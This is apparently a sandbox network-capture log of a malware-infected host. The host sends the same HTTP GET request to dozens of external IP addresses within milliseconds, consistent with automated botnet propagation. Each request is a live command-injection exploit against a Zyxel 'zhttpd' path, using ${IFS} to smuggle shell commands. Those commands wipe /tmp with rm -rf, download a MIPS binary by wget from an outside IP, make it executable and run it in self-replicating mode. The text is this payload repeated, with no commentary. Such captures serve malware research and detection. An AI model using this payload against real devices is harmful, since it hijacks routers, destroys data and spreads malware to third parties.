                              Mar 31, 2024 08:42:11.409986019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8794192.168.2.1359696103.252.4.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410020113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8795192.168.2.135802090.46.42.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410058975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8796192.168.2.134367217.177.104.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410088062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8797192.168.2.1347470168.104.34.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410121918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8798192.168.2.1341978145.141.66.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410161972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8799192.168.2.133774469.196.58.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410202026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8800192.168.2.135597279.139.120.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410223961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8801192.168.2.1360494204.151.204.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410283089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8802192.168.2.134232444.211.68.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410320997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8803192.168.2.1342474204.139.107.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410362005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8804192.168.2.134092425.138.243.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410399914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8805192.168.2.133518671.207.177.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410434961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8806192.168.2.134086887.178.86.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410459995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8807192.168.2.135805034.131.89.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410490990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8808192.168.2.1348026178.178.198.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410535097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8809192.168.2.1338358185.95.252.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410552025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8810192.168.2.134653884.188.90.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410584927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8811192.168.2.1345880160.143.203.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410643101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8812192.168.2.1345440159.77.21.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410691023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8813192.168.2.133859898.153.210.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410734892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8814192.168.2.1339882118.118.104.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410775900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8815192.168.2.1348720179.250.232.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410816908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8816192.168.2.134596442.61.9.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410840988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8817192.168.2.133280862.222.17.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410875082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8818192.168.2.1349538208.15.228.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410902023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8819192.168.2.135470227.114.114.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410962105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8820192.168.2.1359460188.92.184.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.410996914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8821192.168.2.1359316139.137.80.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411026955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8822192.168.2.1335726213.68.45.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411082029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8823192.168.2.135315219.155.214.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411128998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8824192.168.2.1352812121.4.95.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411159992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8825192.168.2.134226698.201.75.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411192894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8826192.168.2.1339282182.133.11.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411236048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8827192.168.2.1359354185.159.1.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411290884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8828192.168.2.1358710195.40.116.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411318064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8829192.168.2.1355886203.108.86.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411355972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8830192.168.2.1343036202.43.24.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411391973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8831192.168.2.1355372124.73.78.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411443949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8832192.168.2.1351736141.245.80.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411477089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8833192.168.2.134525477.77.204.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411520004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8834192.168.2.135098851.216.94.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411552906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8835192.168.2.1342068183.208.62.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411581993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8836192.168.2.135489062.65.247.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411642075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8837192.168.2.134488281.217.231.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411678076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8838192.168.2.135162694.210.155.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411726952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8839192.168.2.13543624.124.233.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411747932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8840192.168.2.1341010216.114.17.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411782980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8841192.168.2.136027472.72.178.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411818981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8842192.168.2.136003881.143.44.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411849976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8843192.168.2.1338468162.233.226.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411869049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8844192.168.2.134422467.137.20.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411916018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8845192.168.2.1334956122.95.156.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.411964893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8846192.168.2.1344148128.48.112.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412000895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8847192.168.2.1355818192.49.152.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412044048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8848192.168.2.1347250145.94.120.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412075996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8849192.168.2.133764096.230.12.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412108898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8850192.168.2.133689419.174.220.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412151098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8851192.168.2.1333320199.206.143.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412172079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8852192.168.2.1347836139.57.173.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412209034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8853192.168.2.1360524222.217.205.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412256956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8854192.168.2.135442487.221.118.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412305117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8855192.168.2.1336850160.86.102.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412324905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8856192.168.2.1353358211.197.146.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412384033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8857192.168.2.1344410166.11.170.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412431955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8858192.168.2.1341056199.61.156.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412456036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8859192.168.2.1359272148.234.253.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412489891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8860192.168.2.1352600216.197.15.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412525892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8861192.168.2.1334376191.160.11.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412570953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8862192.168.2.1348316176.13.149.78443
                              TimestampBytes transferredDirectionData
